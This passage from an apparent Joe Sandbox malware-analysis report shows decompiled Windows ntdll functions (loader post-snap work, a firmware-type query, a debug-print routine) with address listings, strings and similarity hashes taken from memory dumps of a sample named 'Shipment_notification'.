															E01B02280(_t92, 0x1bd86cc);
															_t94 = E01BB9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E01B161A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1bd5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01AF8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1bd5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1bd5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E01B2F380(_t136, 0x1ac1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01B02280(_t108, 0x1bd86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E01B161A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01BB9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E01AFFFB0(_t118, _t156, 0x1bd86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01B29A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                0x01af8799
                                                                                0x01af879d
                                                                                0x01af87a1
                                                                                0x01af87a3
                                                                                0x01af87a8
                                                                                0x01af87c3
                                                                                0x01af87c3
                                                                                0x01af87c8
                                                                                0x01af87d1
                                                                                0x01af87d4
                                                                                0x01af87d8
                                                                                0x01af87e5
                                                                                0x01af87ec
                                                                                0x01b49bfe
                                                                                0x01b49c00
                                                                                0x01b49c02
                                                                                0x01b49c08
                                                                                0x01b49c0d
                                                                                0x01b49c0f
                                                                                0x01b49c14
                                                                                0x01b49c2d
                                                                                0x01b49c32
                                                                                0x01b49c37
                                                                                0x01b49c3a
                                                                                0x01b49c3c
                                                                                0x01b49c42
                                                                                0x01b49c42
                                                                                0x01b49c3c
                                                                                0x01b49c02
                                                                                0x01af87da
                                                                                0x01af87df
                                                                                0x01af87e3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01af87e3
                                                                                0x01af87f2
                                                                                0x00000000
                                                                                0x01af87fb
                                                                                0x01af87fd
                                                                                0x01af87fe
                                                                                0x01af880e
                                                                                0x01af880f
                                                                                0x01af8810
                                                                                0x01af8814
                                                                                0x01af881a
                                                                                0x01af881c
                                                                                0x01af881f
                                                                                0x01af8821
                                                                                0x01af8822
                                                                                0x01af8824
                                                                                0x01af8826
                                                                                0x01af882c
                                                                                0x01af882e
                                                                                0x01b49c48
                                                                                0x01b49c48
                                                                                0x01af8834
                                                                                0x01af8834
                                                                                0x01af8837
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01af8837
                                                                                0x01af882e
                                                                                0x01af883d
                                                                                0x01af8840
                                                                                0x01af8843
                                                                                0x01af8846
                                                                                0x01af8849
                                                                                0x01af884c
                                                                                0x01af884e
                                                                                0x01af8850
                                                                                0x01af8852
                                                                                0x01af8854
                                                                                0x01af8857
                                                                                0x01af88b4
                                                                                0x01af88b6
                                                                                0x01af88b6
                                                                                0x01af8859
                                                                                0x01af8859
                                                                                0x01af8859
                                                                                0x01af8861
                                                                                0x01af8866
                                                                                0x01af886a
                                                                                0x01af893d
                                                                                0x01af8941
                                                                                0x00000000
                                                                                0x01af8947
                                                                                0x01af8947
                                                                                0x01af894a
                                                                                0x01af894c
                                                                                0x00000000
                                                                                0x01af8952
                                                                                0x01af8955
                                                                                0x01af895a
                                                                                0x01af895d
                                                                                0x01af895d
                                                                                0x01af895f
                                                                                0x01af8961
                                                                                0x01af8961
                                                                                0x01af8968
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01af896a
                                                                                0x01af896b
                                                                                0x01af896e
                                                                                0x00000000
                                                                                0x01af8970
                                                                                0x01af8970
                                                                                0x01af8970
                                                                                0x01af8970
                                                                                0x01af8972
                                                                                0x01af8972
                                                                                0x01af8974
                                                                                0x00000000
                                                                                0x01af897a
                                                                                0x01af897a
                                                                                0x01af897d
                                                                                0x00000000
                                                                                0x01af8983
                                                                                0x01b49c65
                                                                                0x01b49c6d
                                                                                0x01b49c72
                                                                                0x01b49c75
                                                                                0x01b49c75
                                                                                0x01b49c82
                                                                                0x01b49c86
                                                                                0x01b49c87
                                                                                0x01b49c88
                                                                                0x01b49c89
                                                                                0x01b49c8c
                                                                                0x01b49c90
                                                                                0x01b49c95
                                                                                0x01b49c97
                                                                                0x01b49ca0
                                                                                0x01b49ca3
                                                                                0x01b49ca9
                                                                                0x01b49ca9
                                                                                0x00000000
                                                                                0x01b49ca9
                                                                                0x01b49ca3
                                                                                0x00000000
                                                                                0x01b49c97
                                                                                0x01af897d
                                                                                0x00000000
                                                                                0x01af8974
                                                                                0x01af8988
                                                                                0x01af8992
                                                                                0x01af8996
                                                                                0x00000000
                                                                                0x01af8996
                                                                                0x01af894c
                                                                                0x00000000
                                                                                0x01af8870
                                                                                0x01af887b
                                                                                0x01af887d
                                                                                0x01af887f
                                                                                0x01af8881
                                                                                0x01af8884
                                                                                0x01af8884
                                                                                0x01af8886
                                                                                0x01af8889
                                                                                0x01af888c
                                                                                0x01af888e
                                                                                0x01af8891
                                                                                0x01af8891
                                                                                0x01af8898
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01af889a
                                                                                0x01af889b
                                                                                0x01af889e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01af88a0
                                                                                0x01af88a8
                                                                                0x01af88b0
                                                                                0x01af88b2
                                                                                0x01af88d3
                                                                                0x01af88d5
                                                                                0x00000000
                                                                                0x01af88d7
                                                                                0x01af88db
                                                                                0x01af88dc
                                                                                0x01af88e0
                                                                                0x01af88e8
                                                                                0x01af88ee
                                                                                0x01af88f0
                                                                                0x01af88f3
                                                                                0x01af88fc
                                                                                0x01af8901
                                                                                0x01af8906
                                                                                0x01af890c
                                                                                0x01af890c
                                                                                0x01af890f
                                                                                0x01af8916
                                                                                0x01af8917
                                                                                0x01af8918
                                                                                0x01af8919
                                                                                0x01af891a
                                                                                0x01af891f
                                                                                0x01af8921
                                                                                0x01b49c52
                                                                                0x01b49c55
                                                                                0x01b49c5b
                                                                                0x01b49cac
                                                                                0x01b49cc0
                                                                                0x01b49cc0
                                                                                0x01b49c55
                                                                                0x01af8927
                                                                                0x01af8927
                                                                                0x01af892f
                                                                                0x01af8933
                                                                                0x00000000
                                                                                0x01af88f5
                                                                                0x01af88f5
                                                                                0x00000000
                                                                                0x01af88f7
                                                                                0x01af88f7
                                                                                0x01af88fa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01af88fa
                                                                                0x01af88f5
                                                                                0x01af88f3
                                                                                0x00000000
                                                                                0x01af88d5
                                                                                0x00000000
                                                                                0x01af88b2
                                                                                0x01af88c9
                                                                                0x00000000
                                                                                0x01af88c9
                                                                                0x01af887f
                                                                                0x01af886a
                                                                                0x01af8857
                                                                                0x01af8852
                                                                                0x01af88bf
                                                                                0x01af88bf
                                                                                0x01af87aa
                                                                                0x01af87ad
                                                                                0x01af87ae
                                                                                0x01af87b4
                                                                                0x01af87b5
                                                                                0x01af87b6
                                                                                0x01af87b8
                                                                                0x01af87bd
                                                                                0x01af87c1
                                                                                0x01af87f4
                                                                                0x01af87fa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01af87c1
                                                                                0x00000000

                                                                                Strings
                                                                                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01B49C18
                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 01B49C28
                                                                                • LdrpDoPostSnapWork, xrefs: 01B49C1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                • API String ID: 2994545307-1948996284
                                                                                • Opcode ID: f46834ee9a887c33803c0f8b1df018ea4313a217f6b11261d64418ba6c2d31c3
                                                                                • Instruction ID: 863e366167256e04a3bf00b7eca7da8d32da32b4bc0363734ce587e3125ec918
                                                                                • Opcode Fuzzy Hash: f46834ee9a887c33803c0f8b1df018ea4313a217f6b11261d64418ba6c2d31c3
                                                                                • Instruction Fuzzy Hash: 4E91F131A00216ABEF29DF99D480ABABBB5FF44354F1541ADFA05AB251E734E901CBD0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B651BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 77%
                                                                                			E01B651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x1bc05f0);
				E01B3D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E01AFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E01B653CA(0);
						return E01B3D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E01B2F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01B03690(1, _t117, 0x1ac1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E01B2AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01B04620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E01B2AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E01B6500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01B29860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                0x01b651be
                                                                                0x01b651c3
                                                                                0x01b651c8
                                                                                0x01b651cd
                                                                                0x01b651d0
                                                                                0x01b651d3
                                                                                0x01b651d8
                                                                                0x01b651db
                                                                                0x01b651de
                                                                                0x01b651e0
                                                                                0x01b651e3
                                                                                0x01b651e6
                                                                                0x01b651e8
                                                                                0x01b65342
                                                                                0x01b65351
                                                                                0x01b65356
                                                                                0x01b6535a
                                                                                0x01b65360
                                                                                0x01b65363
                                                                                0x01b65366
                                                                                0x01b65369
                                                                                0x01b65369
                                                                                0x01b6536b
                                                                                0x01b6536b
                                                                                0x01b65370
                                                                                0x01b653a3
                                                                                0x01b653a4
                                                                                0x01b653a6
                                                                                0x01b653ab
                                                                                0x01b653ab
                                                                                0x01b653ae
                                                                                0x01b653ae
                                                                                0x01b653b5
                                                                                0x01b653bf
                                                                                0x01b653bf
                                                                                0x01b65375
                                                                                0x01b65396
                                                                                0x01b653a0
                                                                                0x01b653a0
                                                                                0x00000000
                                                                                0x01b65396
                                                                                0x01b65377
                                                                                0x01b65379
                                                                                0x01b6537f
                                                                                0x01b6538c
                                                                                0x01b65390
                                                                                0x00000000
                                                                                0x01b65390
                                                                                0x01b651ee
                                                                                0x01b651f1
                                                                                0x01b65301
                                                                                0x01b65310
                                                                                0x01b65315
                                                                                0x01b65318
                                                                                0x01b6531b
                                                                                0x01b65320
                                                                                0x01b6532e
                                                                                0x01b65331
                                                                                0x00000000
                                                                                0x01b65331
                                                                                0x01b65328
                                                                                0x01b65329
                                                                                0x00000000
                                                                                0x01b65329
                                                                                0x01b651fa
                                                                                0x01b65235
                                                                                0x01b65236
                                                                                0x01b65239
                                                                                0x01b6523f
                                                                                0x01b65240
                                                                                0x01b65241
                                                                                0x01b65242
                                                                                0x01b65246
                                                                                0x01b65247
                                                                                0x01b6524e
                                                                                0x01b65251
                                                                                0x01b65267
                                                                                0x01b65269
                                                                                0x01b6526e
                                                                                0x01b6527d
                                                                                0x01b6527e
                                                                                0x01b65281
                                                                                0x01b65282
                                                                                0x01b65287
                                                                                0x01b65288
                                                                                0x01b6528a
                                                                                0x01b6528f
                                                                                0x01b65294
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b6529a
                                                                                0x01b6529c
                                                                                0x01b6529e
                                                                                0x01b6529e
                                                                                0x01b652a4
                                                                                0x01b652b0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b652ba
                                                                                0x01b652bc
                                                                                0x01b652bc
                                                                                0x01b652d4
                                                                                0x01b652d9
                                                                                0x01b652dc
                                                                                0x01b652e1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b652e7
                                                                                0x01b652f4
                                                                                0x00000000
                                                                                0x01b652f4
                                                                                0x01b65270
                                                                                0x00000000
                                                                                0x01b65270
                                                                                0x01b651fc
                                                                                0x01b651fd
                                                                                0x01b65202
                                                                                0x01b65203
                                                                                0x01b65205
                                                                                0x01b6520a
                                                                                0x01b6520f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b6521b
                                                                                0x01b65226
                                                                                0x01b6522b
                                                                                0x01b6521d
                                                                                0x01b6521d
                                                                                0x01b65222
                                                                                0x01b65222
                                                                                0x01b6522d
                                                                                0x00000000

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: Legacy$UEFI
                                                                                • API String ID: 2994545307-634100481
                                                                                • Opcode ID: f0869b056233337e6633a3384a428d9bf5d9b62b00231e7046d3e134a581ce1b
                                                                                • Instruction ID: e7a535fd99852cb73561487562b5b1855b0835a17e95886fa770f66937721177
                                                                                • Opcode Fuzzy Hash: f0869b056233337e6633a3384a428d9bf5d9b62b00231e7046d3e134a581ce1b
                                                                                • Instruction Fuzzy Hash: D7518171E007199FDB29DFA8C880AADBBF8FF58B40F1440ADE64AEB251D7759910CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AEB171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 78%
                                                                                			E01AEB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x1bbf7a8);
				E01B3D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E01B3D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E01B2D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E01B2F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L01B3DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E01B2B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E01B2B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E01B2E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E01B2A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                0x01aeb171
                                                                                0x01aeb171
                                                                                0x01aeb171
                                                                                0x01aeb171
                                                                                0x01aeb171
                                                                                0x01aeb176
                                                                                0x01aeb17b
                                                                                0x01aeb180
                                                                                0x01aeb186
                                                                                0x01aeb18f
                                                                                0x01aeb198
                                                                                0x01aeb1a4
                                                                                0x01aeb1aa
                                                                                0x01b44802
                                                                                0x01b44802
                                                                                0x01b44805
                                                                                0x01b4480c
                                                                                0x01b4480e
                                                                                0x01aeb1d1
                                                                                0x01aeb1d3
                                                                                0x01aeb1de
                                                                                0x01aeb1de
                                                                                0x01b44817
                                                                                0x01b4481e
                                                                                0x01b44820
                                                                                0x01b44822
                                                                                0x01b44822
                                                                                0x01b44824
                                                                                0x01b44824
                                                                                0x01b4482a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b44835
                                                                                0x01b4483a
                                                                                0x01b4483d
                                                                                0x01b4483f
                                                                                0x01b44842
                                                                                0x01b44842
                                                                                0x01b44842
                                                                                0x01b44846
                                                                                0x01b4484c
                                                                                0x01b4484e
                                                                                0x01b44851
                                                                                0x01b44851
                                                                                0x01b44853
                                                                                0x01b44854
                                                                                0x01b44854
                                                                                0x01b44858
                                                                                0x01b4485a
                                                                                0x01b4485a
                                                                                0x01b4485d
                                                                                0x01b4485f
                                                                                0x01b44861
                                                                                0x01b44861
                                                                                0x01b44866
                                                                                0x01b4486b
                                                                                0x01b4486e
                                                                                0x01b44871
                                                                                0x01b44876
                                                                                0x01b44876
                                                                                0x01b44878
                                                                                0x01b4487b
                                                                                0x01b44884
                                                                                0x01b44884
                                                                                0x00000000
                                                                                0x01b4487d
                                                                                0x01b4487d
                                                                                0x01b44882
                                                                                0x01b44889
                                                                                0x01b44889
                                                                                0x01b4488f
                                                                                0x01b44891
                                                                                0x01b448e0
                                                                                0x01b448e2
                                                                                0x01b448e4
                                                                                0x01b448e4
                                                                                0x01b448e7
                                                                                0x01b448e7
                                                                                0x01b448ed
                                                                                0x01b448f4
                                                                                0x01b448f6
                                                                                0x01b44951
                                                                                0x01b44951
                                                                                0x01b44953
                                                                                0x01b44953
                                                                                0x01b44956
                                                                                0x01b44956
                                                                                0x01b44958
                                                                                0x01b44959
                                                                                0x01b44959
                                                                                0x01b4495d
                                                                                0x01b4495d
                                                                                0x01b4495f
                                                                                0x01b4495f
                                                                                0x01b44965
                                                                                0x01b44969
                                                                                0x01b449ba
                                                                                0x01b449ba
                                                                                0x01b449c1
                                                                                0x01b449c5
                                                                                0x01b449cc
                                                                                0x01b449d4
